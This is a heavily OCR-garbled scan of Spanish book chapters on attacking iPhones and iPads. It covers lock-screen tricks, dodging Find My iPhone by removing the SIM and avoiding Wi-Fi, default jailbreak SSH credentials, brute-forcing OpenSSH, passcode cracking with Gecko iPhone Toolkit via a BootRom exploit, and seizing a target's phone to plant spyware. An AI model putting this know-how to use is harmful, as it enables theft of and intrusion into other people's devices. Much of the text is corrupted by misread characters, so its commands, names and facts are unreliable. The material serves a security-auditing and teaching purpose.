En  iOS  Ó  Apple  introdujo  Pcis.vBüok^  una  aplicación  para  recibir  las  eiilradas  digitales  para  cualquier 
lipo  de  evento  o  espectáculo.  Funciona  como  una  cartera  de  recepción  de  entradas  y  por  defecto  está 
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hahiliLad(3  con  la  pantalla  bloqueada.  En  la  versión  íOS  ólO.i  se  solucionó  el  bug  CVE-2012-375Ü 
debido  a  que  se  comprobó  que  si  se  recibía  el  ticket  con  la  pantalla  bloqueada  era  posible  acceder  a 
la  entiada  y,  por  ejemplo,  tirarle  mía  foto  para  copiarla. 


7.  Otras  manipulaciones  en  local 

Juice  Jacking 

Las  Lücnicas  do  Juice  Jacking  salieron  a  la  luz  en  la  Dcfcon  19  de  2011,  cuando  se  estableció  un 
puesto  para  recargar  la  batería  de  los  móviles  que  inforinaba  de  que  podía  robar  los  datos.  En  los 
Lemiinales  Phane,  desde  que  se  inLn>diiJ(3  el  eifnido  de  iPhonc  Data  Pmtecñon,  esto  solo  se  puede 
Imcer  cuando  se  conoce  el  código  de  desbloqueo  o  mediante  ia  explotación  de  un  biíg  para  hacer 
LUi  tethering  o  untetherlng  JaiibreaL  Este  no  es  el  objetivo  de  este  capítulo,  que  será  tratado  más 
adelante,  así  que  si  el  Lenriinal  tiene  un  pass-code,  cíju  las  Leenicas  da  J7iicc  Jacking  se  podrá  obtener 
algo  de  información,  pero  nada  más. 

Simplemente  conectando  uiiienmnal  íPhone  o  zT^tiía'sin  desbloquear  a  un  equipo  Windows  es  posible 
obtener  el  número  de  serie,  y  la  versión  exacta  del  sistema  operativo,  en  la  imagen  siguiente:  se 
aprecia  el  de  nr  íOÓ'  .L  /  ,  /.  Además,  Tíimhién  se  puede  conocer  el  almacenamiento  que  tiene  ocupado 
actuaimente  con  fotografías,  vídeos,  notas  o  documentos.  Sin  embargo,  a  pesar  de  que  aparezca  la 
opción  de  impoitar  fotografías,  esto  nu  va  a  ser  posible  en  las  versiones  iOS  4JÍ  o  superiores  sin 
desbloquear  el  terminal. 


Imagen  02.29:  Intbrmacíón  qus  se  obtiene  de  üü  iPkone  sin  desblciquear  en  iin 


Capiwlo  11.  Aíaqves  ¡ocales  (iPhoníi  Local  Tricks} 


47 


Si  se  desea  hacer  esto,  es  necesario  tener  nn  equipo  preparado,  y  lo  que  es  más  impoilante,  tener  los 
cables  de  conexión  de  iPhonE  <]  iFa¿!.  A  partk  de  íFhone  5  Apptc  decidió  cambiar  el  concctor,  así 
que  hay  que  disponer  de  un  conector  "‘'clásico''  y  dcl  nuevo  ¡¡ghinuíg.  Para  ello  es  posible  utilizar 
c(  mee  Lo  res  entre  ambos. 


Imagen  02.30-  Conecto  res  y  adaptadores  para  las  pruebas  per^  íes  ring. 


Más  accimies  con  el  terminal  bloqueado  que  pueden  ser  útiles 

Por  Último,  existen  una  serie  <lc  acciones  con  el  teroiinal  bloqueado  que  pueden  utilizarse  para  casos 
puntales.  Tal  vez  no  sean  trucos  de  hacking^  pcrt3  sí  se  va  a  hacer  pentesting  de  iFho?jc  o  iPads, 
entonces  el  atacante  debe  tener  soltura  con  su  manejo.  Estas  son  las  acciones  que  se  pueden  hacer 
sin  ponei*  el  passeode  y  desbloquear  el  teléfono: 

Responder  a  una  llamada  de  te  le  fono;  Si  alguien  llama  se  puede  contestar  (es  el 
runcionamíento  normal  de  todos  los  teléfonos  hoy  en  día). 

Responder  con  llaiuada  a  una  llamada  perdida:  La  idmeión  se  Uama  "‘Slidc  Tt>  Aiiswcr' , 
y  está  disponible  en  versiones  iOS  5.Xy  superior  Si  se  visualizan  los  mensajes  de  llamadas 
perdidas  por  pantalla  se  puede  devolver  la  llamada  sin  desbloquear  el  terminal. 

"  Responder  con  mensaje:  En  iOS  d,  en  caso  de  que  haya  una  llamada  activa,  se  puede 
desplazar  el  scroll  hacia  arriba  para  enviar  un  meosaje  al  usuario  que  está  realizando  la 
llaiTiada.  EsLü  se  puede  desactivar  desde  las  opciones  de  configuración. 


Imagen  Ü2.31:  Re&ponrier  enn  un  iiiénf^aie;- 
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Poner  música:  Basta  con  pulsar  dos  veces  al  botón  de  acción  para  acceder  al  panel  de  control  de 
la  música,  lo  que  pcmiíLe  acLivar  o  desactivar  el  audío  de  la  música  que  esté  oyendo  el  dueño  del 
tenmnaL  Un  buen  truco  en  caso  de  querer  saber  que  música  le  gusta  o  si  se  desea  escuchar  la 
grabación  que  él  esté  escuchando, 

-  Silenciar  una  llamada  entrante;  Sí  no  se  quiere  cancelar  la  llamada  y  que  ei  emisor  de  la 
misma  detecte  que  no  se  ha  querido  ctaiLestai;  es  posible  dar  una  vez  al  botón  de  bajar  audio 
y  se  desactivará  el  sonido  de  la  llamada. 

-  Cancelar  una  llamada:  Se  Itaee  con  el  botón  de  apagado,  pero  el  remitente  detectará  que 
lia  sido  cancelada, 

lincender/ Apagar  la  pantalla:  La  pantalla  desbloqueada  se  apaga  a  los  pocos  segundos. 
Sin  embargo,  tanto  con  el  botón  de  acción  como  con  el  de  encender/apagar  el  termina^  la 
pantalla  se  cneientle.  Para  apagarla  hay  que  pulsar  una  vez  en  el  botón  de  encender/apagait 

Poner  en  modo  \ibración:  Aunque  se  puede  cambiar  el  eomporLamieiiLo  de  'ia  pestaña 
lateral*’  de  los  iPhor?e  4,  iPhotic  4S  o  iPhone  5,  por  defecto  su  utilidad  es  para  variar  entre  el 
modo  silencio  o  no. 

Extraer  la  SIM  para  poder  analizar  el  címtenido  de  la  Tnisina  con  un  dispositivo  de  análisis 
forense. 

-  Apagan'Enccnder  el  tcnniiial:  Si  hay  que  llevarse  el  temiinaf  y  no  se  desea  ser  detectado 
con  los  servicios  de  Fuid  My  iPhone^  cnUmecs  es  necesario  apagarlo  antes  de  salii  con  éL 
Después,  antes  de  encenderlo  hay  que  asegurarse  de  que  no  existe  ninguna  Wi-Fí  cerca  y 
de  haberle  quitado  la  SIM  al  termijiai.  Esto  es  lo  que  hacen  los  ladrones  y  les  funciona 
perfectamente.  Si  se  enciende  el  Lermirial  buscará  cLmeetarse  a  Inieinet,  lo  que  permitirá 
descubrir  qué  redes  Wi  Fi  está  buscando  para  conectarse  (incluso  si  están  ocultas), 

-  Hará  reset:  Se  puede  hacer  un  reínicio  del  temiinal  paia  forzar  su  apagado  cuando  se  ha 
quedado  bloqueado.  Para  ello  se  deben  pulsar  durante  unos  segundos  e!  botón  de  acción  y  el 
de  encendido.  El  terminal  recibirá  una  orden  de  reinicio  a  nivel  de  hardware, 

-  Hacer  fotogmíias  en  IOS  5  o  superior:  Como  se  ha  explicado  con  anterioridad. 

-  Hacer  capturas  de  pantalla  dcl  lermioal:  Aunque  el  terminal  esté  bloqueado  se  pueden 
hacer  capturas  de  pantalla  pulsando  los  botones  de  acción  y  apagad<j.  Es  itimitadu  el  numero 

de  capturas  que  se  pueden  hacer.  ^ 

-  > 

El  equipo  pareado  o  el  dispositivo  con  Jailbreak 

Antes  de  temiinait  hay  un  lema  impoilante  a  tener  en  cuenta.  Durante  todo  este  capítulo  se  supone 
que  el  atacante  ti  ene  acceso  local  al  Lerininal  sin  tener  cerca  un  equipo  pareado,  es  decin  un  equipo 
eti  el  que  el  diseño  haya  conectado  su  terminal  a  iTimes,  para  sincronizarlo. 

Si  el  equipo  se  conecta,  vía  Wi  l  i,  vía  cable,  o  vía  Bluetooth  a.  un  equipt)  con  el  que  ha  sido  pareado 
prcviaiTierite,  eoLonces,  sin  conocer  el  passeode  será  posible  acceder  a  toda  la  estructura  de  carpetas 
con  una  aplicación  tipo  íFunBox,  tal  y  como  puede  verse  en  la  siguiente  imagen. 


Copítido  II.  Ataques  locaies  (iPhíifm  Local  Tricks) 
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Tma^ep.  Ü2.32:  Aoueso  ii  ctirpdas  ác  un  terminal  pareado  con  iFtínBox. 


■Atu  comportamiento  será  similar  si  el  usuario  ha  jealizado  un  proceso  He  Jallbreak,  y  ha  dejado 
^  usuarios  y  contraseñas  por  defecLíi  para  que  funcionen  con  OpenbSIL  lo  que  hará  que  no  sea 
ecesaj’io  conocer  el passeode  para  poder  acceder  a  todos  los  ñcheros  desde  cualquier  sistcTna. 


8.  Creación  de  un  laboratorio 


tn  caso  de  que  se  deseen  hacer  pruebas  con  ¿rhoue,  ya  sean  las  locales  (que  se  han  visto  en  este 
capitulo)  o  las  que  se  van  a  describir  a  lo  largo  del  presente  ]]l)rí>,  es  necesario  ser  paciente  e  ir 
aleccionando  ios  diferentes  luodclas  con  diferentes  versiones.  Por  cada  modelo  hay  que  tener  uno 
ron  cada  versión  del  sisLcma  npeTativo  que  soporte,  pai'a  disponer  asi  de  unaréplicd  exacta  tic  In  ípie 
el  dispositivo  objetivo  del  ataque. 

En  versiones  /Pbofje  4  con  iOS  hasta  4.3.4  era  posible  ir  guardando  los  ‘iHSH  íiiiuados  por  Apple 
fCü  cada  versión,  esto  obliga  a  tener  versiones  con  JaUbreak  para  poder  volver  a  dejar  una  versión 
•toncreta  que  interese,  en  un  momento  detcmimado,  HerrainieuLus  como  Tiny  Umbrella  sirven  para 
este  propósito. 

para  iPhoíie  4S  con  ¡OS  5  u  iPhone  5  can  iOS  esto  no  es  tan  sencillo  ya  que  los  SHSH  de  Ápph  ya 
ÍKi  valen,  asi  que  k>  ideal  sería  disponer  de  terminales  de  las  diferentes  series  para  tener  "un  poco  de 
i»do''  y  poder  así  preparar  la  estrategia  antes  de  Liernpo. 

ly  webs,  como  MacConverierej^  donde  se  pueden  ir  comprando  versiones  antiguas  a  buen  precio. 
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Notu:  Antes  de  comprarlo,  hay  que  comprobar  el  número  de  serie  y  el  IMEí,  para  evitar 
que  pueda  ser  material  robado  y  deje  de  funcionar  a  los  pocos  días. 


Por  último  hay  que  disponer  de  los  cables  de  conexión  clásico  y  lighíníng,  con  todc}s  los  conectores 
posibles,  para  poder  así  utilizarlos  en  un  determinado  momento  y,  por  supuesto,  tener  las  llaves  de 
extracción  de  SIM  o  clif^  necesarios. 

Alo  largo  del  libro  se  irán  mostrando  más  herramientas  de  software  y  de  hardware  que  serán  muy  útiles 
para  las  auditorías  de  seguridad  con  dispositivos  móviles  de  Apple^  Otras  herramientas  provechosas 
pueden  ser  las  tarjetas  interposter  para  liberar  un  terminal  de  un  operador  o  ios  extractores  de  datos 
de  las  diferentes  tarjetas  SIM,  para  un  hipotético  análisis  forense. 


^Gapjtuío  IIL  Jailbreak 


Capítulo  III 
Jailbreak 


1.  Requisando  el  dispositivo 


Ed  el  proceso  de  auditoría  se  ha  detcrmÍTiado  que  hay  que  requisar  el  teniimal  poique  Lacen  falta 
^  datos  que  hay  el  inismu.  Se  requiere  acceder  a  la  infommcióii  que  está  almacenada  en  él  y  por 
Is^lOTTo  es  necesario  interceptar  el  dispositivo  a  uii  objetivo  para  hacerle  un  análisis  forense  en  toda 
2la,  o  para  introducirle  algún  troyano  que  permita  espiar  las  acciones  del  usuario  en  reoioio.  En 
i  i^ífiaitiya,  hay  que  obtener  el  terminal. 

embargo,  esto  que  parece  muy  evidente  puede  que  no  sea  Itj  más  recomendable,  si  no  va  a  ser 
sable  acceder  al  temiinah  y  hasta  que  se  liberen  nuevas  versiones  áoJalIhvak^  llevaise  un  tennínal 
One  5  o  IPhone  4S  con  íOS  b  sin  conocer  el passeode  puede  sigiiificai  que  uo  se  obtengan  más 
QS  de  los  que  se  pueden  sacar  con  los  trucos  de  hacking  locales  explicados  en  el  capítulo  de 
^húneLoeal  fricks"'. 

Ikesos  casos,  laúnica  opción  que  queda  es  intentar avenguar  el pas^code  previamente  usando  alguno 
•áe  los  nucos  ya  explicados,  para  luego  poder  hacer  el  análisis  del  lenninal  c<m  las  herramientas  que 
^van  a  explicar  a  continuación  o  requisar  también  un  equipo  en  el  que  Apple  íTimes  esté  pareado 
el  terminal  ¡Phoíie  o  iPail  ya  qne  entonces  el  problema  de  acceder  al  Lcnninal  se  reducirá  al 
ablcma  de  acceder  al  equipo^  ya  que  si  el  terminal  está  pareado  es  posible  acceder  sin  conocer  el 
escode  a  la  estructura  de  ficheros. 

Si  por  el  cOLitrarío  el  terminal  es  un  íPhone  3C5\  iPhonQ  4  o  iPhone  4S  con  iOS  5.X^  en  Loncos  requisar 
d  dispositiva  os  una  buena  opción  para  poder  sacar  información  jugosa  de  la  auditoría  mediante  uú 
ílisis  forense,  ya  que  para  todos  ellos  existe  la  posibilidad  de  acceder  al  sistema  de  ficheros  sin 
cesidad  de  conocer  el  pa^scocle.  Para  ello,  se  va  a  proceder  con  diferentes  herramicnLas  que  lleven 
1  analista  a  tener  un  control  total  del  dispositivo  y  devolverlo  al  ducho  a  gusto  de  aquel. 

Üna  vez  que  se  han  decidido  los  objetivos  a  requisar,  ya  sea  el  terminal  fOó'  y/o  el  equipo  pareado 
.con  Apple  ¡Tunes,  es  necesario  tomar  alguna  protección  extra.  Los  datos  en  un  dispositivo  iPhone 
|jaiistraído  se  pueden  perder  por  una  mala  manipulación  por  parle  dcl  analista  (hay  que  transportar 
^siempre  el  terminal  de  manera  segura),  o  por  un  sisLcina  de  autodefensa  del  terminal,  que  básicamente 
son  dos: 
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-  Find  My  iPhmie:  Esta  herramienta  pennile  al  dueño  de  un  terminal  perdido  enviar  un 
comando  para  que  se  boTTen  todos  los  tlalos  riel  dispositivtL  Esta  orden  üe^a  a  través  de 
InEernet  y  para  evitar  su  efecto  hay  que  bloquear  cualquier  conexión  a  Internet  del  terminal. 
Para  ello  hay  que  evitai  la  conexión  a  la  red  de  telefonía,  redes  de  datos  GPRS  o  3ü.  Es  decir, 
hay  que  quitarle  la  STM  al  terminaf 

Ln  segundo  lugar  hay  que  evitar  que  se  conecte  por  medio  de  cualquier  red  IVi-Fi  en  el 
momento  en  que  se  vaya  a  encender  el  sistema,  por  lo  que  hay  que  intentar  encenderlo  y 
manipularlo  en  una  ubicación  en  la  que  no  haya  ninguna  red  Wí-F¡  cerca,  y  sí  es  necesario, 
construir  una  caja  /  'of  adav  como  explican  los  miembros  de  Taddong  en  el  libro  de  ‘"Hacking 
y  seguridad  en  comunicaciones  móviles”. 


líiiagen  Oi.ui:  FiiaUus  Famday  para  Ira (isporTar  termii jales  sin  colectividad  exterior. 


Si  lio  se  dispone  de  una  caja  o  funda  famday,  es  recomendable  dirigirse  a  una  ubicación 
donde  se  tengan  monilorizadas  las  redes  Wi-Fi\  y  utilizar  alguna  de  las  henanii entas  que 
permitan  conocer  todas  las  que  haya  alrededor 

-  Borrado  de  datos  por  número  de  fallos  en  passeode:  En  el  capítulo  de  ¡Fhone  Locai 
Tncks  ya  se  mencitmó  que  hay  una  protección  que  bon  a  ios  datos  si  el  número  de  fallos  es 
igual  a  10,  Si  el  analista  no  está  seguro  de  si  esa  opción  está  activada  o  no,  se  recíimicnda  no 
probar  passeodes  al  azar. 

Hay  que  tener  en  cuenta,  en  caso  de  haber  tomado  posesión  también  del  equipo  PC  pareado  que  esto 
mismo  puede  suceder  con  cL  Existen  hcrramictiLas  de  monitorízacíóii  remota  que  realizan  también 
el  bon-ado  de  datos  de  fonna  segura,  como  por  ejemplo  la  popular  aplicación  Prey\  que  puede  que 
arruinen  todo  el  proceso  de  auditoría,  o  simplemente  existan  aplicaciones  configuradas  con  servicios 
en  la  nube  que  permitan  localizar  el  equipo  remotamente. 

Además,  antes  de  tomar  el  control  de  un  ordenador,  hay  que  tener  presente  t\uí:  existen  soluciones 
de  cifrado  completo  del  misino  como  BííLocker^  TrueCrypt  o  FiieVauIi,  que  evitarían  el  acceso  aí 
sistema  y  por  tanto  el  poder  sacar  provecho  del  pareo  con  el  terminal  ¡Phone  o  ¡Fad, 

Una  vez  que  se  dispone  del  dispositivo  asegurado  y  encendido  en  una  ubicación  segura,  y  del  equipo 
que  se  ha  decidido  a  interceptar,  llega  el  momento  de  tomar  el  control  del  terminal  o  evaluar  las 
opciones  que  quedan. 


Capítulo  IIL  Jallhrcak 
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Imiigttii  03,02:  remoto  por  Frey  a  uaa  máqci  ma  héjr  OS  X. 


2.  Accediendo  a  los  datos  del  sistema 

Para  acceder  al  tenninal  e  iospeccionar  el  contenido  del  dispositivo  y  de  las  aplicaciones,  como 
la  base  de  dalos  de  los  mensajes  de  WJicilÁapp,  las  cookles  de  sesión  de  las  aplicaciones  como 
kacebúok  Linkedm  o  cualquier  otra,  acceder  a  los  datos  de  las  llamadas  de  Idcfoiio,  o  en  definitiva 
I  hacer  un  análisis  forense  del  contenido  de  los  datos  existen  varias  alternativas  que  pueden  utilizarse: 

1  -  Análisis  deJ  backup  de  iOS  en  el  equipo  pareado:  Este  análisis  se  muestra  en  detalle  en 

1  el  capítulo  de  '^XXanálisis  fíirense  del  hackup'^t, 

-  Análisis  forense  del  terminal  desde  el  e<[iiipo  pareado:  Si  se  tiene  cnnlrtsl  dd  equipo 
parcadíu  se  puede  coneeLar  el  tenninal  a  él,  y  bien  liaciendo  uso  de  herramientas  como 
iPunUox  que  permiten  acceder  a  la  estnictura  de  ficbenis  o  con  soluciones  profesioTiales 

,  como  Forefisic  SuiíeJpXtrsLor  todos  los  datos.  Para  ello,  lo  más  fácil  es  Instalar  estas 

herramientas  en  el  equipt]  pareado  y  liacei  el  trabajo  de  extracción  de  datos  y  de  análisis 
desde  el  mismo. 

-  El  terminal  tiene  JaLlbreak  y  OpeiiSSll:  Si  el  usuario  dueño  del  tenninal  había  hecho 
Jüilhreük  al  sisLcma,  enLonees  conviene  probar  a  conectarse  vía  OpenSSM  con  el  usuario  wat 
con  contraseña  alpina.  Si  esto  no  fuera  posible  habría  que  probar  otras  opekmes,  ya  que  es 
posible  qne  el  usuario  haya  fortiíicado  su  instalación  de  OpefiSSíL 
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Para  eUo,  primero  hay  que  localizar  el  pucrlt)  de  Úpi^nSSH^  ya  que  este  puede  haber  cambiado. 
Por  lo  tanto  el  primer  paso  es  realizar  im  esceneo  de  puertos  con  alguna  hcrrainieriLa  corno 
Nmap  para  estar  seguro  de  en  qué  puerto  está  el  servidor  OpenSSlL  si  es  que  estuviera. 

Una  vez  localizado  el  servidor  OpEnSSfí es  necesario  recordar  que  no  solo  está  el  usuario  roo! 
con  contraseña  aipíne^  sino  que  también  es  posible  utilizar  el  usuario  mohile  con  contraseña 
doiíí^  yá  que  tal  vez  se  hayan  cambiado  las  passwordá^  root,  pero  no  la  de  este  usuario,  que 
atuiqiie  tiene  muchos  menos  privilegios  también  permitirá  acceder  a  los  datos  de  las  apps. 

En  ultimo  lugar,  si  se  ha  conseguido  encontrar  el  puerto,  pero  no  las  contraseñas,  se  puede 
intentar  un  auique  de  fuerza  bmta  o  diccionario ,  En  la  ccmñgn ración  de  OpenSSH  que  se 
realiza  en  el  fichero  s'p.trJssh/sshd_c(mfig  se  establece  el  número  de  intentos  antes  de  "lirar 
abajo  la  coiiexióif'  en  el  parámetro  MaxAufhTí'ies.  Este  parámetro  por  defecto  viene 
coTTicnladü,  con  lo  que  es  posible  probai^  hasta  el  infinito. 


t.  c  : 

i¡; 


lTT:agCTi  Uj.US:  Fuxáintílru  Miu^AuihTñu^'  dt  OpiínSSH. 

-  El  terminal  tiene  paNscnile,  nn  tiene  Jailbreak,  pero  es  un  iPtione  3GS/4:  En  este  caso 
se  puede  intentar  romper  primeramente  el passeode  utilizando  una  herramienta  como  Gecko 
iPhone  Tüolkit  para,  una  vez  obtenido  el  passeode,  conectarse  al  terminal  y  acceder  a  todos 
los  datos  con  al  gnu  a  íle  las  altcmuLivas  presentadas,  aunque  la  más  eficiente  sería  mediante 
una  herrainienta  de  análisis  forense  profesional 

Se  puede  utilizar  GecAí?,  porque  como  ya  se  verá  más  adelante  se  basa  en  un  exploit  que  solo 
ñiiicíoTia  en  los  chips  A4,  por  lo  que  no  es  factible  usarlo  en  iPhone  4S  o  iPho?w  5.  Además 
hay  que  tener  en  cuenta  que  es  posible  qm  el  usuario,  enmn  se  muestra  en  el  capítulo  de 
iPhone  Local  Trlclis^  tenga  un  pmscodc  demasiado  complejo  que  no  permita  obtenerlo  en 
tiennpo  útil  para  k)  que  habrá  que  evaluar  otras  alternativas. 

El  terminal  tiene  un  passeode  complejig  mi  tiene  Jailbreak.  pero  es  un  LPlionc  3GS/4: 
La  ultima  opción  posible  es  utilizar  miJailbtvakú^  BootRom^  es  decir,  que  se  encucu Ira  antes 
del  arranque  completo  del  sistema,  lo  que  permite  explotar  las  vulnerabilidades  sin  necesidad 
de  conocer  el  passeode,  y  ejecutar  programas  en  el  terminal  como  por  ejemplo  OpenSSH. 
Esto  se  verá  un  poco  más  adelante  en  este  mismo  capítulo 

-  El  terminal  es  un  iPKune  4S  íi  un  iPlioiic  5,  tiene  un  passeode  que  iiu  se  ha  podido 
averiguar,  no  tiene  Jailbreak  y  no  se  tiene  un  ec}uipu  pareado:  Toca  esperar  hasta  que 
salga  algún  exploit  de  BootRom^  que  de  momento  no  existe.  Lo  único  que  se  puede  hacer  es 
no  apagar  el  terminal  averiguar  a  qué  redes  l¥i-F¡  se  está  conectando,  y  analizar  el  tráfico 
pam  ver  si  es  posible  acceder  a  algiin  dato  tal  y  como  como  se  explica  en  el  capítulo  de 
XXA laques  de  red  a  iFhone, 
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,pecko  es  una  herramienta  gratuita  que  lunciotia  bajo  Windom^  y  que  se  puede  dcscarírar  de  varios 
web.  La  heiiamieiita  básieameote  realiza  un  aLaque  de  fuerza  bruta  o  diccionario  ai  passcode  de 
|m  dispositivo  íPhone.  aunque  tiene  el  inconveniente  de  qite  tío  funciona  para  todos  los  dispositivos 
iOS.  F.n  el  momento  de  escribir  este  libro,  txinciona  solo  con  iPhone^  3GS^  ¡Phone  4  GSM,  iPad  /, 
iPod  Ibuch  (2G,  3G  y  4G). 

El  ñincionamiento  es  muy  simple,  y  consiste  en  dos  pasos, 

-  Primer  paso:  Es  necesario  conocer  el  modelo  exacto  de!  terminal  y  la  versión  exacLa  del 
sistema  operativo,  para  lo  que  se  deben  utilizar  las  lécnicas  deseriLas  en  el  capítulo  de  iPhmm 
Local  Tdcks.  Si  no  se  ha  podido  obtener  la  versión  de  iOS  exacta  se  puede  intentar  conectar 
el  LcrmiTml  a  una  red  Wi-Fi  {analizando  las  redes  que  busca  y  creándole  una  Rugtti^AP)  para 
poder  analizar  las  cabeceras  User-Ágeni  y  saber  exaclamen  Le  la  versión. 

Una  vez  que  se  tiene  esa  información,  cuando  se  arranca  la  herramienta  se  Jiace  cÜc  en  el 
botón  Boot.  con  el  teléfono  conectado  y  apagado.  Para  ello,  hay  que  enchufar  el  terniinal 
encendido  con  el  cable  ai  equipo  donde  está  Gecko ^  y  Lina  vez  conectado  se  apaga  el 
dispositivo.  Esto  dejará  el  terminal  eonecUido  fTsieamente  con  el  cable  al  ordenador  pero  con 
el  si s tem a  ( íperati vo  apa  gad  o . 

Una  vez  se  haya  dado  al  botón  Boot^  Gecko  iPhone  Toolkii  solieiturá  el  firmware  original 
acorde  a  la  versión  de  iOS  que  corre  en  el  dispositivo,  tal  y  como  se  muestra  en  la  siguiente 
eaptira  en  la  que  el  ataque  se  va  a  realizar  sobre  el  passcode  de  un  tPad, 


tiiiagcii  03,04;  GeckjO  jP/j[7ní?  Toolkit  F;olic;t2.ndo  el  fiFmv^-arv.  ürigiuLi]  ú^Apph'. 


Es  necesario  que  ese^/i?7ííw¿zrí?  esté  en  el  ordenador  descargado  para  que  pueda  ser  seleccionado 
desde  Gecko,  por  lo  qiie  habrá  que  descarga! ío  previamente.  Para  localizar  todo  c]  fir}mvafv 
necesario  pam  este  tipo  de  ataques,  lo  mejor  es  utilizar  Eina  web  como  hí:ip://www,getíos,com,-  - 
aunque  también  están  disponibles  en  las  web  de  Apple. 


www.9etíiaá.coiii 


iDevice: 

1^^^  I¿1 


|T-Wirtr3G  13 


¡5«-T  ^ 


Iniagtíj]  03. 0>:  de  la  web  geiios.com  para  p-mv^-ares  de  iOS. 
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Una  vez  descargado  y  seleccionado  el  lirmware  correcto  en  Gecko  tPhone  Tooikit^ 
aiitomáti carne nie  se  abre  la  aplicación  RedsnChw  que  viene  mcluida  dentro  de  las  hetTamientas 
de  Gecko.  Esta  hcrramientíi  es  una  herramienta  de  JaUbreak  muy  popular  que  se  explicará  un 
poco  más  adelante  para  utilizarla  de  manera  independiente. 

Como  se  puede  ver,  ¡Pkone  Gecko  Toolkü  utilizará  Redsnihv  para  lanzar  el  expíoU  de 
BootRom  contra  el  dispííddvo  con  f^\  firmware  original  con  alguna  modificación  necesaria 
introducida  por  Gecko  para  poder  hacer  el  ataque  de  fuerza  bruta  y  conseguir  crackear  el 
passeode  del  dispositivo. 

Para  conseguir  lanzar  el  ataque  al  pas.'^code  con  Gecko  iPhotte  Tooikit,  desde  RedsnÚw  habrá 
que  realizar  la  típica  combinación  de  teclas,  de  igual  iiiaiiera  que  cuando  se  haga  un  JaUbreak 
al  tertninaU  para  entrar  en  modo  DFU  (Devíce  Fírmware  Vpdafe)  y  que  Apple  ¡Tunes  no  de 
eiTor.  Para  eso  hay  que  seguir  detalladamente  los  pasos  que  indica  la  aplicación  y  llevar  bien 
k  cuenta  de  los  segundos,  lodo  está  explicado  paso  a  paso  en  RedsnOw. 


[iníigcn  031J6i  Redmíhv  abiertf>  de  marera  aLJíoiiiálica  e  í[idÍQariUi;i  que  ye  debe  íiaccr. 

Una  vez  terminados  los  pasos,  y  entrado  el  dispositivo  en  modo  DFU,  comenzará  el  amque  al 
passeode^  para  lo  que  previamente  se  podrá  visualizar  un  gran  mensaje  de  OK  en  la  pantalla 
de!  temiinaí,  y  se  habrá  terminado  correctamenle  k  primera  fase  del  ataque. 

Podría  darse  d  caso  de  que  al  realizar  la  combinación  de  teclas  esta  no  se  realizase 
cfirrecta mente,  o  incluso  que  se  aplicase  de  forma  correcta  pero  un  poco  a  destiempo.  Lin 
tal  caso  no  habría  ningún  problema,  ya  que  si  el  proceso  no  tuviera  éxito  a  la  primera,  solo 
se  debe  intentar  de  nuevo,  volviendo  a  apagar  el  terminal  estando  conectado  al  ordenador  y 
corn enzar  desde  el  principio.  Con  un  poco  de  práctica  este  proceso  de  poner  el  dispositivo  en 
modo  DFU  se  podrá  realizar  con  los  ojos  cerrados  y  con  un  1 ÜO  %  de  éxito  siempre. 
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Alijas  i  3 

Ho  rtiflrfclrig  perfor^*^. 
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Ofitíúfi  lo  forcé  checiclrig. 

UitarSlDcfe:  frmr  16  opeTiing  /dev/adB 

HM  i«  ra 

m" 

M  •*  •« 

Wlf' 

m  m 

«  M  «« 

■im. 

m  m  M 

IH  «1  H 

linageta  03.07:  Mensaje  de  OK  que  upLueueriL  en  d  lemniaJ  con  íPhone  Gsckú  Túalkit. 


-  Segundu  píiso:  Una  vez  que  el  proceso  de  Jailbreak  ha  finalizado,  es  momento  de  liaccr 
clic  en  ei  botón  Laimt'h  de  GEcko  iPhone  Toolkit.  Ln  ese  momento  comienza  el  algoritmo 
de  crackeo,  que  pnede  tardar  varios  minutos  dependiendo  de  la  velocidad  del  dispositivo. 
Hn  un  íPad  1  con  código  simple  el  tiempo  necesario  para  obtener  tXpasseode  es  de  unos  20 
minutos,  pero  finainicnle  aparece  e! pos%codej  tal  corno  se  aprecia  en  la  siguiente  captura,  en 
k  que  se  ha  crakcado  el  passseode  de  un  íPad  I  con  ¿OS  5.(1  /: 


luiiigdii  03 .OS:  Gecko  despulís  de  crackjearel  paFiíiCdrIe  de  mi  iPmJ  L 


Hay  que  recordar  que  si  el  terminal  tiene  un  complejo  este  proceso  puede  alargarse  c 

incluso  no  dar  con  él  en  un  tiempo  útil,  por  lo  que  será  necesario  evaluar  otras  alternativas  a  este 
procedimiento. 
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3.  ¿Qué  es  Jailbreak? 

Realizar  Jailbf'eak  a  im  dispositivo  iOS^  es  el  proceso  de  romper  el  Cndp.-Sigmiig^  que  es  esa  medida 
de  seguridad  que  aplica  Apple  para  que  solo  se  puedan  descargar,  instalar  y  ejecutar  aplicaciones 
firmadas  por  una  entidad  certificadora  de  confianza,  cuya  raíz  de  certificación  proviene  de  la  propia 
Apple.  Como  se  menciona  en  otros  capítulos;  actúa  a  modo  de  protección  de  seguridad,  filtrando  los 
contenidos  que  se  suben  o  se  publican  en  la  App  ^tare,  dificultando  así  la  propagación  o  difusión  de 
mahvm'e  y  aplicaciones  maliciosas. 

Esta  medida  de  seguridad,  el  Code-Signlng.  obliga  a  que  todo  el  software  deba  ir  firma  do  j  por  lo 
que  cualquier  intento  de  instalación  o  ejecución,  ya  sea  de  una  aplicación,  o  de  una  página  o  código 
proveniente  de  memoria,  no  es  permitida,  a  menos  que  vaya  firmada  digítalmente  por  un  certificado 
que  procetbi  de  una  entidad  de  confianza.  Esto  hace  que  infectarse  sea  complicado,  pero  teniendo  en 
cuenta  que  solo  cuando  dielm  protección  está  funcionando,  por  lo  que  el  hecho  de  Juilbreak 

y  romper  dicha  protección,  entraña  una  serie  de  riesgos,  ya  que  gran  parte  de  la  seguridad  del  sistema 
cae  completamente. 

Realizar  un  Jailbreak,  no  solo  se  rompe  la  protección  de  Code-Signlng,  mediante  una  serie  de 
modificaciones  a  nivel  de  kerneí,  y  es  posible  ejecutar  código  sin  firmal,  sino  que  además  es  posible 
tener  un  acceso  completo  el  sistema  de  ficheros,  y  al  sistema  operativo,,  ya  que  realmente  uxi  Jailbreak 
es  una  fomia  de  escalada  de  privilegios. 

Hacer  un  Jailbreak  incide  y  mucho  en  la  seguridad  del  dispositivo,  aunque  muchos  usuarios 
domésticos  crean  que  realizar  este  proceso  es  solo  para  liberar  el  terminal  y  poder  instalaren  iPhonc 
o  iPad  aplicaciones  no  firmadas  por  Apple,  como  extensiones  o  tv^eaks,  o  temas  que  no  estén 
disponibles  a  través  del  canal  de  distribución  oficial  dej  fabricante  (la  App  Store),  o  incliLso  el  uso 
que  le  dan  muchos^  que  no  es  más  que  descargar  aplicaciones  de  pago  tic  manera  gratuita,  utilizando 
